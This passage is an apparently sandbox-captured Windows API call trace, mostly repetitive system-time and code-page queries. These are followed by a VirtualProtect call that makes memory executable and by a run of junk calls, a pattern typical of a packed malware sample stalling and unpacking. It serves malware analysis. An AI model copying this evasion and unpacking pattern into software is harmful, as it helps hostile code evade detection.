lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.287] GetACP () returned 0x4e4 [0080.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.288] GetACP () returned 0x4e4 [0080.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.289] GetACP () returned 0x4e4 [0080.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.290] GetACP () returned 0x4e4 [0080.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.291] GetACP () returned 0x4e4 [0080.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.291] GetACP () returned 0x4e4 [0080.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.291] GetACP () returned 0x4e4 [0080.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.291] GetACP () returned 0x4e4 [0080.781] VirtualProtect (in: lpAddress=0x4f5ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0080.781] AddAtomA (lpString=0x0) returned 0x0 [0080.781] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.782] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.782] AddAtomA (lpString=0x0) returned 0x0 [0080.782] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.783] AddAtomA (lpString=0x0) returned 0x0 [0080.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.783] AddAtomA (lpString=0x0) returned 0x0 [0080.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.783] AddAtomA (lpString=0x0) returned 0x0 [0080.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.783] AddAtomA (lpString=0x0) returned 0x0 [0080.783] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.783] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.783] AddAtomA (lpString=0x0) returned 0x0 [0080.831] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.831] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.832] AddAtomA (lpString=0x0) returned 0x0 [0080.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.832] AddAtomA (lpString=0x0) returned 0x0 [0080.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.832] AddAtomA (lpString=0x0) returned 0x0 [0080.832] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.832] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.832] AddAtomA (lpString=0x0) returned 0x0 [0080.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.833] AddAtomA (lpString=0x0) returned 0x0 [0080.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.833] AddAtomA (lpString=0x0) returned 0x0 [0080.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.833] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.833] AddAtomA (lpString=0x0) returned 0x0 [0080.833] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.834] AddAtomA (lpString=0x0) returned 0x0 [0080.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.834] AddAtomA (lpString=0x0) returned 0x0 [0080.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.834] AddAtomA (lpString=0x0) returned 0x0 [0080.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.834] AddAtomA (lpString=0x0) returned 0x0 [0080.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.835] AddAtomA (lpString=0x0) returned 0x0 [0080.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.835] AddAtomA (lpString=0x0) returned 0x0 [0080.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.835] AddAtomA (lpString=0x0) returned 0x0 [0080.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.835] AddAtomA (lpString=0x0) returned 0x0 [0080.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.836] AddAtomA (lpString=0x0) returned 0x0 [0080.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.836] AddAtomA (lpString=0x0) returned 0x0 [0080.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.836] AddAtomA (lpString=0x0) returned 0x0 [0080.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.836] AddAtomA (lpString=0x0) returned 0x0 [0080.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.837] AddAtomA (lpString=0x0) returned 0x0 [0080.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.837] AddAtomA (lpString=0x0) returned 0x0 [0080.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.837] AddAtomA (lpString=0x0) returned 0x0 [0080.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.838] AddAtomA (lpString=0x0) returned 0x0 [0080.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.838] AddAtomA (lpString=0x0) returned 0x0 [0080.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.838] AddAtomA (lpString=0x0) returned 0x0 [0080.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.838] AddAtomA (lpString=0x0) returned 0x0 [0080.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.839] AddAtomA (lpString=0x0) returned 0x0 [0080.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.839] AddAtomA (lpString=0x0) returned 0x0 [0080.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.839] AddAtomA (lpString=0x0) returned 0x0 [0080.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.839] AddAtomA (lpString=0x0) returned 0x0 [0080.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.840] AddAtomA (lpString=0x0) returned 0x0 [0080.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.840] AddAtomA (lpString=0x0) returned 0x0 [0080.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.840] AddAtomA (lpString=0x0) returned 0x0 [0080.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.840] AddAtomA (lpString=0x0) returned 0x0 [0080.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.841] AddAtomA (lpString=0x0) returned 0x0 [0080.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.841] AddAtomA (lpString=0x0) returned 0x0 [0080.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.841] AddAtomA (lpString=0x0) returned 0x0 [0080.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.841] AddAtomA (lpString=0x0) returned 0x0 [0080.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.842] AddAtomA (lpString=0x0) returned 0x0 [0080.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.842] AddAtomA (lpString=0x0) returned 0x0 [0080.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.842] AddAtomA (lpString=0x0) returned 0x0 [0080.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.842] AddAtomA (lpString=0x0) returned 0x0 [0080.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.843] AddAtomA (lpString=0x0) returned 0x0 [0080.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.843] AddAtomA (lpString=0x0) returned 0x0 [0080.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.843] AddAtomA (lpString=0x0) returned 0x0 [0080.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.843] AddAtomA (lpString=0x0) returned 0x0 [0080.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.845] AddAtomA (lpString=0x0) returned 0x0 [0080.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.845] AddAtomA (lpString=0x0) returned 0x0 